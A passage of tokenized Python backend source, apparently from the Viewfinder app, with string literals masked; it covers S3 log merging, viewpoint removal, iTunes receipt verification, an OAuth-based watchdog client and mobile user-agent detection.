day_log . FetchExistingFromS3 ) <EOL> day_log = day_instance_logs [ ( instance , day ) ] <EOL> day_log . Append ( entry ) <EOL> callback ( ) <EOL> @ gen . engine <EOL> def _ProcessOneFile ( instance , contents , callback ) : <EOL> """<STR_LIT>""" <EOL> buf = cStringIO . StringIO ( contents ) <EOL> buf . seek ( <NUM_LIT:0> ) <EOL> entry = '<STR_LIT>' <EOL> while True : <EOL> line = buf . readline ( ) <EOL> if not line : <EOL> yield gen . Task ( _AddEntry , instance , entry ) <EOL> break <EOL> if line . startswith ( ( '<STR_LIT:U+0020>' , '<STR_LIT:\t>' ) ) or logs_util . ParseLogLine ( line ) is None : <EOL> entry += '<STR_LIT:U+0020>' + line . strip ( ) <EOL> else : <EOL> yield gen . Task ( _AddEntry , instance , entry ) <EOL> entry = line . strip ( ) <EOL> buf . close ( ) <EOL> callback ( ) <EOL> for filename in filenames : <EOL> instance = logs_paths . RawLogPathToInstance ( filename ) <EOL> assert instance <EOL> contents = '<STR_LIT>' <EOL> try : <EOL> contents = yield gen . Task ( logs_store . Get , filename ) <EOL> except Exception as e : <EOL> logging . error ( '<STR_LIT>' % ( filename , e ) ) <EOL> continue <EOL> logging . info ( '<STR_LIT>' % ( len ( contents ) , filename ) ) <EOL> yield gen . Task ( _ProcessOneFile , instance , contents ) <EOL> processed_files . append ( filename ) <EOL> for log in day_instance_logs . values ( ) : <EOL> log . FlushBuffer ( ) <EOL> for instance_day , log in day_instance_logs . iteritems ( ) : <EOL> log . Close ( ) <EOL> if not dry_run : <EOL> try : <EOL> yield gen . Task ( log . Upload ) <EOL> except Exception as e : <EOL> logging . error ( '<STR_LIT>' % ( instance_day , e ) ) <EOL> log . Cleanup ( ) <EOL> callback ( processed_files ) <EOL> @ gen . engine <EOL> def GetRawLogsFileList ( logs_store , logs_paths , marker , callback ) : <EOL> """<STR_LIT>""" <EOL> def _WantFile ( filename ) : <EOL> instance = logs_paths . RawLogPathToInstance ( filename ) <EOL> if instance is None : <EOL> logging . error ( '<STR_LIT>' % filename ) <EOL> return False <EOL> return not options . options . ec2_only or logs_util . IsEC2Instance ( instance ) <EOL> base_path = logs_paths . RawDirectory ( ) <EOL> marker = os . path . join ( base_path , marker ) if marker is not None else None <EOL> file_list = yield gen . Task ( store_utils . ListAllKeys , logs_store , prefix = base_path , marker = marker ) <EOL> files = [ f for f in file_list if _WantFile ( f ) ] <EOL> logging . info ( '<STR_LIT>' % ( len ( file_list ) , len ( files ) ) ) <EOL> callback ( files ) <EOL> @ gen . engine <EOL> def RunOnce ( callback ) : <EOL> """<STR_LIT>""" <EOL> dry_run = options . options . dry_run <EOL> logs_paths = logs_util . ServerLogsPaths ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if dry_run : <EOL> logging . warning ( '<STR_LIT>' ) <EOL> logs_store = ObjectStore . GetInstance ( logs_paths . SOURCE_LOGS_BUCKET ) <EOL> merged_store = ObjectStore . GetInstance ( logs_paths . MERGED_LOGS_BUCKET ) <EOL> files = yield gen . Task ( GetRawLogsFileList , logs_store , logs_paths , options . options . start_date ) <EOL> processed_files = yield gen . Task ( logs_util . GetRegistry , merged_store , logs_paths . ProcessedRegistryPath ( ) ) <EOL> if processed_files is None : <EOL> processed_files = [ ] <EOL> files_set = set ( files ) <EOL> processed_set = set ( processed_files ) <EOL> missing_files = list ( files_set . difference ( processed_set ) ) <EOL> missing_files . sort ( ) <EOL> to_process = missing_files <EOL> if options . options . max_files_to_process is not None : <EOL> to_process = missing_files [ <NUM_LIT:0> : options . options . max_files_to_process ] <EOL> logging . info ( '<STR_LIT>' % <EOL> ( len ( files ) , len ( processed_files ) , len ( missing_files ) , len ( to_process ) ) ) <EOL> if len ( missing_files ) == <NUM_LIT:0> : <EOL> logging . info ( '<STR_LIT>' ) <EOL> callback ( ) <EOL> return <EOL> merged_files = yield gen . Task ( ProcessFiles , logs_store , merged_store , logs_paths , to_process , dry_run ) <EOL> logging . info ( '<STR_LIT>' % <EOL> ( len ( files ) , len ( processed_files ) , len ( missing_files ) , len ( merged_files ) ) ) <EOL> processed_files . extend ( merged_files ) <EOL> processed_files . sort ( ) <EOL> if not dry_run : <EOL> yield gen . Task ( retry . CallWithRetryAsync , kS3UploadRetryPolicy , <EOL> logs_util . WriteRegistry , merged_store , logs_paths . ProcessedRegistryPath ( ) , processed_files ) <EOL> callback ( ) <EOL> @ gen . engine <EOL> def _Start ( callback ) : <EOL> """<STR_LIT>""" <EOL> client = db_client . DBClient . Instance ( ) <EOL> job = Job ( client , '<STR_LIT>' ) <EOL> if options . options . require_lock : <EOL> got_lock = yield gen . Task ( job . AcquireLock ) <EOL> if got_lock == False : <EOL> logging . warning ( '<STR_LIT>' ) <EOL> callback ( ) <EOL> return <EOL> try : <EOL> yield gen . Task ( RunOnce ) <EOL> finally : <EOL> yield gen . Task ( job . ReleaseLock ) <EOL> callback ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . exit ( main . InitAndRun ( _Start ) ) </s>
<s> """<STR_LIT>""" <EOL> __authors__ = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> import json <EOL> from tornado import gen <EOL> from viewfinder . backend . base . exceptions import PermissionError <EOL> from viewfinder . backend . db . accounting import AccountingAccumulator <EOL> from viewfinder . backend . db . follower import Follower <EOL> from viewfinder . backend . db . operation import Operation <EOL> from viewfinder . backend . db . viewpoint import Viewpoint <EOL> from viewfinder . backend . op . notification_manager import NotificationManager <EOL> from viewfinder . backend . op . viewfinder_op import ViewfinderOperation <EOL> class RemoveViewpointOperation ( ViewfinderOperation ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , client , user_id , viewpoint_id ) : <EOL> super ( RemoveViewpointOperation , self ) . __init__ ( client ) <EOL> self . _op = Operation . GetCurrent ( ) <EOL> self . _client = client <EOL> self . _user_id = user_id <EOL> self . _viewpoint_id = viewpoint_id <EOL> @ classmethod <EOL> @ gen . coroutine <EOL> def Execute ( cls , client , user_id , viewpoint_id ) : <EOL> """<STR_LIT>""" <EOL> yield RemoveViewpointOperation ( client , user_id , viewpoint_id ) . _RemoveViewpoint ( ) <EOL> @ gen . coroutine <EOL> def _RemoveViewpoint ( self ) : <EOL> """<STR_LIT>""" <EOL> lock = yield gen . Task ( Viewpoint . AcquireLock , self . _client , self . _viewpoint_id ) <EOL> try : <EOL> if not ( yield self . _Check ( ) ) : <EOL> return <EOL> self . _client . CheckDBNotModified ( ) <EOL> yield self . _Update ( ) <EOL> yield self . _Account ( ) <EOL> yield Operation . TriggerFailpoint ( self . _client ) <EOL> yield self . _Notify ( ) <EOL> finally : <EOL> yield gen . Task ( Viewpoint . ReleaseLock , self . _client , self . _viewpoint_id , lock ) <EOL> @ gen . coroutine <EOL> def _Check ( self ) : <EOL> """<STR_LIT>""" <EOL> self . _follower = yield gen . Task ( Follower . Query , <EOL> self . _client , <EOL> self . _user_id , <EOL> self . _viewpoint_id , <EOL> None , <EOL> must_exist = False ) <EOL> if self . _follower is None : <EOL> raise PermissionError ( '<STR_LIT>' % <EOL> ( self . _user_id , self . _viewpoint_id ) ) <EOL> if self . _op . checkpoint is None : <EOL> if self . _follower . IsRemoved ( ) : <EOL> raise gen . Return ( False ) <EOL> yield self . _op . SetCheckpoint ( self . _client , { '<STR_LIT:state>' : '<STR_LIT>' } ) <EOL> raise gen . Return ( True ) <EOL> @ gen . coroutine <EOL> def _Update ( self ) : <EOL> """<STR_LIT>""" <EOL> yield self . _follower . RemoveViewpoint ( self . _client ) <EOL> @ gen . coroutine <EOL> def _Account ( self ) : <EOL> """<STR_LIT>""" <EOL> acc_accum = AccountingAccumulator ( ) <EOL> yield acc_accum . RemoveViewpoint ( self . _client , self . _user_id , self . _viewpoint_id ) <EOL> yield acc_accum . Apply ( self . _client ) <EOL> @ gen . coroutine <EOL> def _Notify ( self ) : <EOL> """<STR_LIT>""" <EOL> yield NotificationManager . NotifyRemoveViewpoint ( self . _client , self . _user_id , self . _viewpoint_id ) </s>
<s> """<STR_LIT>""" <EOL> import base64 <EOL> import json <EOL> import logging <EOL> import time <EOL> from tornado . httpclient import AsyncHTTPClient <EOL> from viewfinder . backend . base import secrets <EOL> class ITunesStoreError ( Exception ) : <EOL> pass <EOL> kViewfinderBundleId = '<STR_LIT>' <EOL> class VerifyResponse ( object ) : <EOL> JSON_ERROR = <NUM_LIT> <EOL> MALFORMED_RECEIPT_ERROR = <NUM_LIT> <EOL> SIGNATURE_ERROR = <NUM_LIT> <EOL> PASSWORD_ERROR = <NUM_LIT> <EOL> SERVER_UNAVAILABLE_ERROR = <NUM_LIT> <EOL> EXPIRED_ERROR = <NUM_LIT> <EOL> SANDBOX_ON_PROD_ERROR = <NUM_LIT> <EOL> PROD_ON_SANDBOX_ERROR = <NUM_LIT> <EOL> FINAL_ERRORS = set ( [ JSON_ERROR , MALFORMED_RECEIPT_ERROR , SIGNATURE_ERROR , <EOL> SANDBOX_ON_PROD_ERROR ] ) <EOL> NON_FINAL_ERRORS = set ( [ PASSWORD_ERROR , SERVER_UNAVAILABLE_ERROR , <EOL> PROD_ON_SANDBOX_ERROR ] ) <EOL> def __init__ ( self , orig_receipt , response_body ) : <EOL> self . orig_receipt = orig_receipt <EOL> self . response = json . loads ( response_body ) <EOL> def GetStatus ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . response [ '<STR_LIT:status>' ] <EOL> def IsValid ( self ) : <EOL> """<STR_LIT>""" <EOL> status = self . GetStatus ( ) <EOL> if status == <NUM_LIT:0> or status == VerifyResponse . EXPIRED_ERROR : <EOL> if self . GetBundleId ( ) != kViewfinderBundleId : <EOL> logging . warning ( '<STR_LIT>' , self . GetBundleId ( ) ) <EOL> return False <EOL> return True <EOL> elif status in VerifyResponse . FINAL_ERRORS : <EOL> return False <EOL> else : <EOL> raise ITunesStoreError ( '<STR_LIT>' % status ) <EOL> def GetLatestReceiptInfo ( self ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in self . response : <EOL> return self . response [ '<STR_LIT>' ] <EOL> elif '<STR_LIT>' in self . response : <EOL> return self . response [ '<STR_LIT>' ] <EOL> else : <EOL> return self . response [ '<STR_LIT>' ] <EOL> def GetBundleId ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . GetLatestReceiptInfo ( ) [ '<STR_LIT>' ] <EOL> def GetProductId ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . GetLatestReceiptInfo ( ) [ '<STR_LIT>' ] <EOL> def GetTransactionTime ( self ) : <EOL> """<STR_LIT>""" <EOL> time_ms = int ( self . GetLatestReceiptInfo ( ) [ '<STR_LIT>' ] ) <EOL> return float ( time_ms ) / <NUM_LIT:1000> <EOL> def GetExpirationTime ( self ) : <EOL> """<STR_LIT>""" <EOL> expires_ms = int ( self . GetLatestReceiptInfo ( ) [ '<STR_LIT>' ] ) <EOL> return float ( expires_ms ) / <NUM_LIT:1000> <EOL> def IsExpired ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . GetExpirationTime ( ) < time . time ( ) <EOL> def IsRenewable ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . response [ '<STR_LIT:status>' ] == <NUM_LIT:0> <EOL> def GetRenewalData ( self ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' in self . response : <EOL> return base64 . b64decode ( self . response [ '<STR_LIT>' ] ) <EOL> else : <EOL> return self . orig_receipt <EOL> def GetOriginalTransactionId ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . GetLatestReceiptInfo ( ) [ '<STR_LIT>' ] <EOL> def GetRenewalTransactionId ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . GetLatestReceiptInfo ( ) [ '<STR_LIT>' ] <EOL> def ToString ( self ) : <EOL> return json . dumps ( dict ( orig_receipt = self . orig_receipt , <EOL> response = json . dumps ( self . response ) ) ) <EOL> @ classmethod <EOL> def FromString ( cls , s ) : <EOL> data = json . loads ( s ) <EOL> return cls ( data [ '<STR_LIT>' ] , data [ '<STR_LIT>' ] ) <EOL> class ITunesStoreClient ( object ) : <EOL> _SETTINGS = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> } <EOL> _instance_map = dict ( ) <EOL> def __init__ ( self , environment = '<STR_LIT>' , http_client = None ) : <EOL> self . _settings = ITunesStoreClient . _SETTINGS [ environment ] <EOL> if http_client is None : <EOL> self . http_client = AsyncHTTPClient ( ) <EOL> else : <EOL> self . http_client = http_client <EOL> def VerifyReceipt ( self , receipt_data , callback ) : <EOL> """<STR_LIT>""" <EOL> def _OnFetch ( response ) : <EOL> response . rethrow ( ) <EOL> callback ( VerifyResponse ( receipt_data , response . body ) ) <EOL> request = { <EOL> '<STR_LIT>' : base64 . b64encode ( receipt_data ) , <EOL> '<STR_LIT:password>' : secrets . GetSecret ( '<STR_LIT>' ) , <EOL> } <EOL> self . http_client . fetch ( self . _settings [ '<STR_LIT>' ] , method = '<STR_LIT:POST>' , <EOL> body = json . dumps ( request ) , callback = _OnFetch ) <EOL> @ staticmethod <EOL> def Instance ( environment ) : <EOL> assert environment in ITunesStoreClient . _instance_map , '<STR_LIT>' % environment <EOL> return ITunesStoreClient . _instance_map [ environment ] <EOL> @ staticmethod <EOL> def SetInstance ( environment , itunes_client ) : <EOL> """<STR_LIT>""" <EOL> ITunesStoreClient . _instance_map [ environment ] = itunes_client <EOL> @ staticmethod <EOL> def ClearInstance ( environment ) : <EOL> """<STR_LIT>""" <EOL> del ITunesStoreClient . _instance_map [ environment ] </s>
<s> """<STR_LIT>""" <EOL> __author__ = '<STR_LIT>' <EOL> import logging <EOL> import json <EOL> import os <EOL> import re <EOL> import time <EOL> import urllib <EOL> from viewfinder . backend . base import util , secrets <EOL> from viewfinder . backend . base . environ import ServerEnvironment <EOL> from viewfinder . backend . www import www_util <EOL> from tornado . ioloop import IOLoop <EOL> from tornado import httpclient , options , web <EOL> _GOOGLE_OAUTH2_DEVICECODE_URL = '<STR_LIT>' <EOL> _GOOGLE_OAUTH2_TOKEN_URL = '<STR_LIT>' <EOL> _GOOGLE_OAUTH2_SCOPES = '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' <EOL> options . define ( '<STR_LIT>' , '<STR_LIT>' , help = '<STR_LIT>' ) <EOL> options . define ( '<STR_LIT>' , False , help = '<STR_LIT>' ) <EOL> class ScenarioLoginError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class Scenario ( object ) : <EOL> """<STR_LIT>""" <EOL> _http_error_dict = { <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' , <EOL> <NUM_LIT> : '<STR_LIT>' } <EOL> def __init__ ( self , name , handler , frequency , description = None ) : <EOL> self . name = name <EOL> self . handler = handler <EOL> self . description = description <EOL> self . frequency = frequency <EOL> self . _timeout = None <EOL> def StartLoop ( self , device ) : <EOL> """<STR_LIT>""" <EOL> logger = logging . LoggerAdapter ( logging . getLogger ( ) , { '<STR_LIT>' : self . name } ) <EOL> def _OnComplete ( ) : <EOL> self . _timeout = IOLoop . current ( ) . add_timeout ( time . time ( ) + self . frequency , _RunIteration ) <EOL> def _OnException ( typ , val , tb ) : <EOL> if ( typ , val , tb ) != ( None , None , None ) : <EOL> if typ is web . HTTPError : <EOL> message = self . _http_error_dict . get ( val . status_code , <EOL> '<STR_LIT>' % <EOL> ( val . status_code , val . log_message ) ) <EOL> logger . error ( message ) <EOL> else : <EOL> logger . error ( '<STR_LIT>' , self . name , exc_info = ( typ , val , tb ) ) <EOL> _OnComplete ( ) <EOL> def _RunIteration ( ) : <EOL> with util . Barrier ( _OnComplete , _OnException ) as b : <EOL> self . handler ( device , logger , b . Callback ( ) ) <EOL> _RunIteration ( ) <EOL> def StopLoop ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _timeout is not None : <EOL> IOLoop . current ( ) . remove_timeout ( self . _timeout ) <EOL> class ScenarioDevice ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> self . _svc_url = '<STR_LIT>' % ( ServerEnvironment . GetHost ( ) , options . options . port ) <EOL> self . _user_cookie = None <EOL> if options . options . watchdog_auth_reset : <EOL> self . _ClearAuthentication ( ) <EOL> else : <EOL> self . _LoadAuthentication ( ) <EOL> def SendRequest ( self , service_path , callback , method = '<STR_LIT:POST>' , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if self . _user_cookie is None : <EOL> raise ScenarioLoginError ( '<STR_LIT>' <EOL> % self . name ) <EOL> http_client = httpclient . AsyncHTTPClient ( ) <EOL> url = self . _GetUrl ( service_path ) <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' % ( self . _user_cookie ) , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> if method == '<STR_LIT:GET>' : <EOL> if len ( kwargs ) > <NUM_LIT:0> : <EOL> url += '<STR_LIT:?>' + urllib . urlencode ( kwargs ) <EOL> http_client . fetch ( url , method = method , callback = callback , validate_cert = False , headers = headers ) <EOL> elif method == '<STR_LIT:POST>' : <EOL> headers [ '<STR_LIT:Content-Type>' ] = '<STR_LIT:application/json>' <EOL> request_body = json . dumps ( kwargs ) <EOL> http_client . fetch ( url , method = method , body = request_body , callback = callback , validate_cert = False , <EOL> headers = headers ) <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' % method ) <EOL> def IsAuthenticated ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _user_cookie is not None <EOL> def GetUserCode ( self , callback ) : <EOL> """<STR_LIT>""" <EOL> def _OnGetDeviceCode ( response ) : <EOL> response_dict = www_util . ParseJSONResponse ( response ) <EOL> self . _device_code = response_dict . get ( '<STR_LIT>' ) <EOL> callback ( response_dict . get ( '<STR_LIT>' ) , response_dict . get ( '<STR_LIT>' ) ) <EOL> request_args = { '<STR_LIT>' : secrets . GetSecret ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : _GOOGLE_OAUTH2_SCOPES } <EOL> url = _GOOGLE_OAUTH2_DEVICECODE_URL <EOL> http_client = httpclient . AsyncHTTPClient ( ) <EOL> http_client . fetch ( url , method = '<STR_LIT:POST>' , <EOL> body = urllib . urlencode ( request_args ) , callback = _OnGetDeviceCode ) <EOL> def PollForAuthentication ( self , callback ) : <EOL> """<STR_LIT>""" <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> raise ScenarioLoginError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> http_client = httpclient . AsyncHTTPClient ( ) <EOL> def _OnLogin ( response ) : <EOL> if not response . code in ( <NUM_LIT:200> , <NUM_LIT> ) : <EOL> raise ScenarioLoginError ( '<STR_LIT>' % response . error ) <EOL> self . _user_cookie = self . _GetUserCookieFromResponse ( response ) <EOL> self . _SaveAuthentication ( ) <EOL> callback ( True ) <EOL> def _OnPollTokenEndpoint ( response ) : <EOL> json_response = www_util . ParseJSONResponse ( response ) <EOL> if '<STR_LIT:error>' in json_response : <EOL> callback ( False ) <EOL> else : <EOL> refresh_token = json_response . get ( '<STR_LIT>' ) <EOL> url = '<STR_LIT>' % ( ServerEnvironment . GetHost ( ) , options . options . port , refresh_token ) <EOL> http_client . fetch ( url , method = '<STR_LIT:POST>' , <EOL> callback = _OnLogin , <EOL> body = json . dumps ( { } ) , <EOL> validate_cert = False , follow_redirects = False , <EOL> headers = { '<STR_LIT:Content-Type>' : '<STR_LIT:application/json>' } ) <EOL> url = _GOOGLE_OAUTH2_TOKEN_URL <EOL> request_args = { '<STR_LIT>' : secrets . GetSecret ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : secrets . GetSecret ( '<STR_LIT>' ) , <EOL> '<STR_LIT:code>' : self . _device_code , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> http_client . fetch ( url , method = '<STR_LIT:POST>' , <EOL> body = urllib . urlencode ( request_args ) , <EOL> callback = _OnPollTokenEndpoint ) <EOL> def _GetUserCookieFromResponse ( self , response ) : <EOL> """<STR_LIT>""" <EOL> user_cookie_header = [ h for h in response . headers . get_list ( '<STR_LIT>' ) if h . startswith ( '<STR_LIT>' ) ] [ - <NUM_LIT:1> ] <EOL> return re . match ( r'<STR_LIT>' , user_cookie_header ) . group ( <NUM_LIT:1> ) <EOL> def _LoadAuthentication ( self ) : <EOL> """<STR_LIT>""" <EOL> auth_file = self . _AuthFilePath ( ) <EOL> if os . path . exists ( auth_file ) : <EOL> try : <EOL> fh = open ( auth_file , '<STR_LIT:r>' ) <EOL> self . _user_cookie = fh . read ( ) <EOL> except : <EOL> logging . fatal ( '<STR_LIT>' , auth_file , exc_info = True ) <EOL> raise ScenarioLoginError ( '<STR_LIT>' % self . name ) <EOL> def _SaveAuthentication ( self ) : <EOL> """<STR_LIT>""" <EOL> auth_file = self . _AuthFilePath ( ) <EOL> try : <EOL> dir = os . path . dirname ( auth_file ) <EOL> if not os . path . exists ( dir ) : <EOL> os . makedirs ( dir ) <EOL> fh = open ( auth_file , '<STR_LIT:w>' ) <EOL> fh . write ( self . _user_cookie ) <EOL> fh . close ( ) <EOL> except : <EOL> logging . fatal ( '<STR_LIT>' , auth_file , exc_info = True ) <EOL> raise ScenarioLoginError ( '<STR_LIT>' % self . name ) <EOL> def _ClearAuthentication ( self ) : <EOL> """<STR_LIT>""" <EOL> auth_file = self . _AuthFilePath ( ) <EOL> if os . path . exists ( auth_file ) : <EOL> try : <EOL> os . remove ( auth_file ) <EOL> except : <EOL> logging . fatal ( '<STR_LIT>' , auth_file , exc_info = True ) <EOL> raise ScenarioLoginError ( '<STR_LIT>' % self . name ) <EOL> def _AuthFilePath ( self ) : <EOL> return os . path . join ( options . options . watchdog_auth_dir , self . name ) <EOL> def _GetUrl ( self , path ) : <EOL> return self . _svc_url + path </s>
<s> class UAgentInfo ( object ) : <EOL> """<STR_LIT>""" <EOL> engineWebKit = "<STR_LIT>" <EOL> deviceIphone = "<STR_LIT>" <EOL> deviceIpod = "<STR_LIT>" <EOL> deviceIpad = "<STR_LIT>" <EOL> deviceMacPpc = "<STR_LIT>" <EOL> deviceAndroid = "<STR_LIT>" <EOL> deviceGoogleTV = "<STR_LIT>" <EOL> deviceXoom = "<STR_LIT>" <EOL> deviceHtcFlyer = "<STR_LIT>" <EOL> deviceSymbian = "<STR_LIT>" <EOL> deviceS60 = "<STR_LIT>" <EOL> deviceS70 = "<STR_LIT>" <EOL> deviceS80 = "<STR_LIT>" <EOL> deviceS90 = "<STR_LIT>" <EOL> deviceWinPhone7 = "<STR_LIT>" <EOL> deviceWinMob = "<STR_LIT>" <EOL> deviceWindows = "<STR_LIT>" <EOL> deviceIeMob = "<STR_LIT>" <EOL> devicePpc = "<STR_LIT>" <EOL> enginePie = "<STR_LIT>" <EOL> deviceBB = "<STR_LIT>" <EOL> vndRIM = "<STR_LIT>" <EOL> deviceBBStorm = "<STR_LIT>" <EOL> deviceBBBold = "<STR_LIT>" <EOL> deviceBBBoldTouch = "<STR_LIT>" <EOL> deviceBBTour = "<STR_LIT>" <EOL> deviceBBCurve = "<STR_LIT>" <EOL> deviceBBCurveTouch = "<STR_LIT>" <EOL> deviceBBTorch = "<STR_LIT>" <EOL> deviceBBPlaybook = "<STR_LIT>" <EOL> devicePalm = "<STR_LIT>" <EOL> deviceWebOS = "<STR_LIT>" <EOL> deviceWebOShp = "<STR_LIT>" <EOL> engineBlazer = "<STR_LIT>" <EOL> engineXiino = "<STR_LIT>" <EOL> deviceKindle = "<STR_LIT>" <EOL> engineSilk = "<STR_LIT>" <EOL> deviceNuvifone = "<STR_LIT>" <EOL> vndwap = "<STR_LIT>" <EOL> wml = "<STR_LIT>" <EOL> deviceTablet = "<STR_LIT>" <EOL> deviceBrew = "<STR_LIT>" <EOL> deviceDanger = "<STR_LIT>" <EOL> deviceHiptop = "<STR_LIT>" <EOL> devicePlaystation = "<STR_LIT>" <EOL> deviceNintendoDs = "<STR_LIT>" <EOL> deviceNintendo = "<STR_LIT>" <EOL> deviceWii = "<STR_LIT>" <EOL> deviceXbox = "<STR_LIT>" <EOL> deviceArchos = "<STR_LIT>" <EOL> engineOpera = "<STR_LIT>" <EOL> engineNetfront = "<STR_LIT>" <EOL> engineUpBrowser = "<STR_LIT>" <EOL> engineOpenWeb = "<STR_LIT>" <EOL> deviceMidp = "<STR_LIT>" <EOL> uplink = "<STR_LIT>" <EOL> engineTelecaQ = "<STR_LIT>" <EOL> devicePda = "<STR_LIT>" <EOL> mini = "<STR_LIT>" <EOL> mobile = "<STR_LIT>" <EOL> mobi = "<STR_LIT>" <EOL> maemo = "<STR_LIT>" <EOL> linux = "<STR_LIT>" <EOL> qtembedded = "<STR_LIT>" <EOL> mylocom2 = "<STR_LIT>" <EOL> manuSonyEricsson = "<STR_LIT>" <EOL> manuericsson = "<STR_LIT>" <EOL> manuSamsung1 = "<STR_LIT>" <EOL> manuSony = "<STR_LIT>" <EOL> manuHtc = "<STR_LIT>" <EOL> svcDocomo = "<STR_LIT>" <EOL> svcKddi = "<STR_LIT>" <EOL> svcVodafone = "<STR_LIT>" <EOL> disUpdate = "<STR_LIT>" <EOL> def __init__ ( self , userAgent , httpAccept ) : <EOL> """<STR_LIT>""" <EOL> self . __userAgent = userAgent . lower ( ) if userAgent else "<STR_LIT>" <EOL> self . __httpAccept = httpAccept . lower ( ) if httpAccept else "<STR_LIT>" <EOL> self . __isIphone = False <EOL> self . __isAndroidPhone = False <EOL> self . __isTierTablet = False <EOL> self . __isTierIphone = False <EOL> self . __isTierRichCss = False <EOL> self . __isTierGenericMobile = False <EOL> self . initDeviceScan ( ) <EOL> def getUserAgent ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __userAgent <EOL> def getHttpAccept ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __httpAccept <EOL> def getIsIphone ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __isIphone <EOL> def getIsTierTablet ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __isTierTablet <EOL> def getIsTierIphone ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __isTierIphone <EOL> def getIsTierRichCss ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __isTierRichCss <EOL> def getIsTierGenericMobile ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __isTierGenericMobile <EOL> def initDeviceScan ( self ) : <EOL> """<STR_LIT>""" <EOL> self . __isIphone = self . detectIphoneOrIpod ( ) <EOL> self . __isAndroidPhone = self . detectAndroidPhone ( ) <EOL> self . __isTierTablet = self . detectTierTablet ( ) <EOL> self . __isTierIphone = self . detectTierIphone ( ) <EOL> self . __isTierRichCss = self . detectTierRichCss ( ) <EOL> self . __isTierGenericMobile = self . detectTierOtherPhones ( ) <EOL> def detectIphone ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceIphone in self . __userAgent and not self . detectIpad ( ) and not self . detectIpod ( ) <EOL> def detectIpod ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceIpod in self . __userAgent <EOL> def detectIpad ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceIpad in self . __userAgent and self . detectWebkit ( ) <EOL> def detectIphoneOrIpod ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceIphone in self . __userAgent or UAgentInfo . deviceIpod in self . __userAgent <EOL> def detectIos ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . detectIphoneOrIpod ( ) or self . detectIpad ( ) <EOL> def detectAndroid ( self ) : <EOL> """<STR_LIT>""" <EOL> if UAgentInfo . deviceAndroid in self . __userAgent or self . detectGoogleTV ( ) : <EOL> return True <EOL> return UAgentInfo . deviceHtcFlyer in self . __userAgent <EOL> def detectAndroidPhone ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . detectAndroid ( ) and UAgentInfo . mobile in self . __userAgent : <EOL> return True <EOL> if self . detectOperaAndroidPhone ( ) : <EOL> return True <EOL> return UAgentInfo . deviceHtcFlyer in self . __userAgent <EOL> def detectAndroidTablet ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . detectAndroid ( ) : <EOL> return False <EOL> if self . detectOperaMobile ( ) : <EOL> return False <EOL> if UAgentInfo . deviceHtcFlyer in self . __userAgent : <EOL> return False <EOL> return UAgentInfo . mobile not in self . __userAgent <EOL> def detectAndroidWebKit ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . detectAndroid ( ) and self . detectWebkit ( ) <EOL> def detectGoogleTV ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceGoogleTV in self . __userAgent <EOL> def detectWebkit ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . engineWebKit in self . __userAgent <EOL> def detectS60OssBrowser ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . detectWebkit ( ) and ( UAgentInfo . deviceSymbian in self . __userAgent or UAgentInfo . deviceS60 in self . __userAgent ) <EOL> def detectSymbianOS ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceSymbian in self . __userAgent or UAgentInfo . deviceS60 in self . __userAgent or UAgentInfo . deviceS70 in self . __userAgent or UAgentInfo . deviceS80 in self . __userAgent or UAgentInfo . deviceS90 in self . __userAgent <EOL> def detectWindowsPhone7 ( self ) : <EOL> """<STR_LIT>""" <EOL> return UAgentInfo . deviceWinPhone7 in self . __userAgent <EOL> def detectWindowsMobile ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . detectWindowsPhone7 ( ) : <EOL> return False <EOL> if UAgentInfo . deviceWinMob in self . __userAgent or UAgentInfo . deviceIeMob in self . __userAgent or 